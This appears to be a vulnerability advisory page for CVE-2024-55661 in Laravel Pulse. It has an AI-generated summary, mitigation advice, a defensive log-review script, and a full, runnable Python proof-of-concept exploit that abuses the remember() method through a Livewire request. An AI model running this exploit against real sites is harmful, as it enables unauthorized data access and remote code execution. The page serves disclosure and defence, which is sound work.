Laravel Pulse 1.3.1 - Arbitrary Code Injection
AI Analysis
Technical Summary
The security threat concerns an arbitrary code injection vulnerability identified as CVE-2024-55661 in Laravel Pulse versions prior to 1.3.1. Laravel Pulse is a PHP-based web application package built on the Laravel framework, utilizing Laravel Livewire for reactive components. The vulnerability arises from improper handling in the `remember()` method within the `RemembersQueries` trait. This method can be manipulated by an attacker crafting a malicious Livewire request that invokes arbitrary callable methods. This flaw enables attackers to execute arbitrary PHP code remotely without authentication, provided they can send specially crafted HTTP POST requests to Livewire endpoints. The exploit leverages the Livewire component's ability to call methods dynamically, bypassing intended restrictions. The provided exploit code, written in Python 3, demonstrates how to send such a payload to a vulnerable Laravel Pulse instance. It constructs a JSON request targeting the Livewire message endpoint, specifying the component, method, and parameters to trigger the `remember()` method with attacker-controlled inputs. Successful exploitation can lead to remote code execution (RCE) or sensitive data leakage if unsafe classes or methods are exposed within the application context. The vulnerability affects Laravel Pulse versions earlier than 1.3.1, with no patch links currently provided. No authentication or user interaction is required to exploit this vulnerability, making it a critical risk vector for exposed web applications using vulnerable Laravel Pulse versions. The exploit targets the Livewire message endpoint, typically accessible on web servers hosting Laravel Pulse applications, and can be executed remotely over HTTP/HTTPS.
Potential Impact
For European organizations, this vulnerability poses a significant risk to web applications built using Laravel Pulse prior to version 1.3.1. Exploitation can result in full remote code execution, allowing attackers to execute arbitrary commands, deploy malware, exfiltrate sensitive data, or pivot within the network. This can lead to data breaches, service disruption, and reputational damage. Given Laravel's popularity in Europe, especially among SMEs and startups, organizations using Laravel Pulse components in their web infrastructure are at risk. The vulnerability's ease of exploitation without authentication increases the likelihood of automated scanning and exploitation attempts. Critical sectors such as finance, healthcare, and government institutions relying on Laravel-based applications could face severe operational and compliance impacts, including GDPR violations due to data exposure. Additionally, the exploit could be used to establish persistent backdoors or launch further attacks within corporate networks. The absence of known exploits in the wild currently suggests a window for proactive mitigation before widespread exploitation occurs.
Mitigation Recommendations
1. Immediately upgrade to Laravel Pulse version 1.3.1 or later, where the vulnerability is patched.
2. If upgrading is not immediately feasible, restrict access to Livewire endpoints via network controls such as web application firewalls (WAFs) or IP whitelisting to limit exposure.
3. Implement strict input validation and sanitization on Livewire components to prevent invocation of unsafe methods.
4. Employ runtime application self-protection (RASP) tools to detect and block suspicious dynamic method calls.
5. Monitor web server logs and application logs for unusual POST requests to Livewire endpoints, especially those invoking the `remember()` method.
6. Use Content Security Policy (CSP) headers and disable unnecessary Livewire features if possible.
7. Conduct thorough code reviews to ensure no unsafe classes or methods are exposed to Livewire components.
8. Deploy intrusion detection systems (IDS) tuned to detect exploitation patterns of this vulnerability.
9. Educate development teams about secure usage of dynamic method calls in Laravel Livewire components.
10. Regularly scan web applications with vulnerability scanners that include checks for Laravel Pulse vulnerabilities.
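As an added log-review example in the spirit of recommendation 5 (not part of this page or of the PoC), the helper below inspects logged Livewire POST requests and flags callMethod bodies that invoke remember() or pass a static-callable string as the first parameter, the two traits of the request the PoC builds. The request records are constructed sample data, and the nested updates[].payload shape it also checks is assumed to be Livewire v2's wire format, which the page does not show.

```python
import json
import re

# Constructed request records in the shape a reverse proxy or WAF might log
# (method, path, raw body). Sample data, not real traffic.
EXPLOIT_CALL = {"type": "callMethod", "method": "remember",
                "params": ["\\Illuminate\\Support\\Facades\\Config::all", "exploit"],
                "id": "abcde", "name": "pulse.usage"}
BENIGN_V2 = {"fingerprint": {"name": "search-box"}, "serverMemo": {}, "updates": [
    {"type": "callMethod", "payload": {"id": "x1", "method": "search", "params": ["laravel"]}}]}
SAMPLE_REQUESTS = [
    {"method": "POST", "path": "/livewire/message/pulse.usage", "body": json.dumps(EXPLOIT_CALL)},
    {"method": "POST", "path": "/livewire/message/search-box", "body": json.dumps(BENIGN_V2)},
    {"method": "GET", "path": "/pulse", "body": ""},
    {"method": "POST", "path": "/livewire/message/pulse.servers", "body": "not json at all"},
]

LIVEWIRE_MESSAGE = re.compile(r"^/livewire/message/")
# A PHP static callable written as a string: \Fully\Qualified\Class::method
STATIC_CALLABLE = re.compile(r"^\\?[A-Za-z_][\w\\]*::[A-Za-z_]\w*$")


def extract_calls(body):
    """Yield (method, params) from the PoC's flat body and from Livewire v2's nested
    updates[].payload form (assumed wire format; the page only shows the flat one)."""
    if body.get("type") == "callMethod":
        yield body.get("method"), body.get("params") or []
    for update in body.get("updates") or []:
        if isinstance(update, dict) and update.get("type") == "callMethod":
            payload = update.get("payload") or {}
            yield payload.get("method"), payload.get("params") or []


def classify(req):
    """Return the reasons a logged request looks like CVE-2024-55661 abuse ([] = nothing to flag)."""
    if req["method"] != "POST" or not LIVEWIRE_MESSAGE.match(req["path"]):
        return []
    try:
        body = json.loads(req["body"])
    except (json.JSONDecodeError, TypeError):
        body = None
    if not isinstance(body, dict):
        return ["body is not a JSON object, unexpected for a Livewire message endpoint"]
    reasons = []
    for method, params in extract_calls(body):
        if method == "remember":
            reasons.append("callMethod invokes remember()")
        if params and isinstance(params[0], str) and STATIC_CALLABLE.match(params[0]):
            reasons.append(f"first parameter is a static callable string: {params[0]}")
    return reasons
```

Feed it proxy or WAF records with the same three keys; a request that trips both reasons at once matches the PoC's payload exactly.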
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Poland, Sweden, Belgium, Austria
Indicators of Compromise
- exploit-code:

```python
#!/usr/bin/env python3
# Exploit Title: Laravel Pulse 1.3.1 - Arbitrary Code Injection
# Author: Mohammed Idrees Banyamer (@banyamer_security)
# GitHub: https://github.com/mbanyamer
# Date: 2025-06-06
# Tested on: Laravel Pulse v1.2.0 / Ubuntu 22.04 / Apache2
# CVE: CVE-2024-55661
# Type: Remote Code Execution (via Arbitrary Code Injection)
# Platform: PHP (Laravel Livewire)
# Author Country: Jordan
# Description:
# A vulnerability in Laravel Pulse (< 1.3.1) allows arbitrary code injection via
# the `remember()` method in the `RemembersQueries` trait. The attacker can craft
# a Livewire request to invoke arbitrary callables, enabling data exfiltration or
# remote execution if unsafe classes are exposed.

"""
Laravel Pulse < 1.3.1 - Arbitrary Code Injection Exploit (CVE-2024-55661)
Author: Mohammed Idrees Banyamer | PoC

This tool exploits the vulnerability in the `remember()` method in vulnerable
versions of laravel/pulse to trigger arbitrary code execution or sensitive data
leakage via Livewire.
"""

import argparse
import requests
import json
import sys
from rich import print
from rich.console import Console

console = Console()


class LaravelPulseExploit:
    def __init__(self, url, component, method, csrf=None, key='exploit', component_id='abcde'):
        self.url = url.rstrip('/')
        self.component = component
        self.method = method
        self.csrf = csrf
        self.key = key
        self.component_id = component_id
        self.headers = {
            "Content-Type": "application/json",
            "X-Livewire": "true",
            "Accept": "application/json"
        }
        if csrf:
            self.headers["X-CSRF-TOKEN"] = csrf

    def build_payload(self):
        return {
            "type": "callMethod",
            "method": "remember",
            "params": [self.method, self.key],
            "id": self.component_id,
            "name": self.component
        }

    def send(self):
        full_url = f"{self.url}/livewire/message/{self.component}"
        payload = self.build_payload()
        console.print(f"[bold cyan][*] Sending exploit to:[/bold cyan] {full_url}")
        try:
            response = requests.post(full_url, headers=self.headers, json=payload, timeout=10)
        except requests.exceptions.RequestException as e:
            console.print(f"[bold red][-] Request failed:[/bold red] {str(e)}")
            sys.exit(1)
        self.display_response(response)

    def display_response(self, response):
        console.print(f"\n[bold green][+] Status Code:[/bold green] {response.status_code}")
        if response.status_code == 200:
            try:
                data = response.json()
                pretty_data = json.dumps(data, indent=4, ensure_ascii=False)
                console.print(f"[bold yellow]\n[+] Response JSON:[/bold yellow]\n{pretty_data}")
            except json.JSONDecodeError:
                console.print(f"[bold red][-] Failed to decode JSON:[/bold red]\n{response.text}")
        else:
            console.print(f"[bold red][-] Unexpected response:[/bold red] {response.text}")


def parse_arguments():
    parser = argparse.ArgumentParser(
        description="Exploit Laravel Pulse (<1.3.1) Arbitrary Code Injection (CVE-2024-55661)"
    )
    parser.add_argument("-u", "--url", required=True,
                        help="Base URL of the Laravel app (e.g. http://example.com)")
    parser.add_argument("-c", "--component", required=True,
                        help="Livewire component name (e.g. ConfigComponent)")
    parser.add_argument("-m", "--method", required=True,
                        help="Static method to call (e.g. \\Illuminate\\Support\\Facades\\Config::all)")
    parser.add_argument("-k", "--key", default="exploit", help="Cache key (default: exploit)")
    parser.add_argument("--csrf", help="Optional CSRF token header")
    parser.add_argument("--id", default="abcde", help="Component ID (default: abcde)")
    return parser.parse_args()


def banner():
    console.print(r"""
[bold red]
 ____                    _                         
| __ )  __ _ _ __  _   _ / \   _ __ ___   ___ _ __ 
|  _ \ / _` | '_ \| | | |/ _ \ | '_ ` _ \ / _ \ '__|
| |_) | (_| | | | | |_| / ___ \| | | | | |  __/ |   
|____/ \__,_|_| |_|\__,/_/   \_\_| |_| |_|\___|_|   
                   |___/                            
[/bold red]
[bold white]Laravel Pulse < 1.3.1 Arbitrary Code Injection (CVE-2024-55661)[/bold white]
[blue]Author:[/blue] Mohammed Idrees Banyamer | [green]Poc[/green]
""")


if __name__ == "__main__":
    banner()
    args = parse_arguments()
    exploit = LaravelPulseExploit(
        url=args.url,
        component=args.component,
        method=args.method,
        csrf=args.csrf,
        key=args.key,
        component_id=args.id
    )
    exploit.send()
```
Technical Details
- Edb Id: 52319
- Has Exploit Code: true
- Code Language: python
Threat ID: 68489c7b82cbcead92620aa2
Added to database: 6/10/2025, 8:58:35 PM
Last enriched: 6/11/2025, 8:08:31 AM
Last updated: 8/19/2025, 8:28:55 PM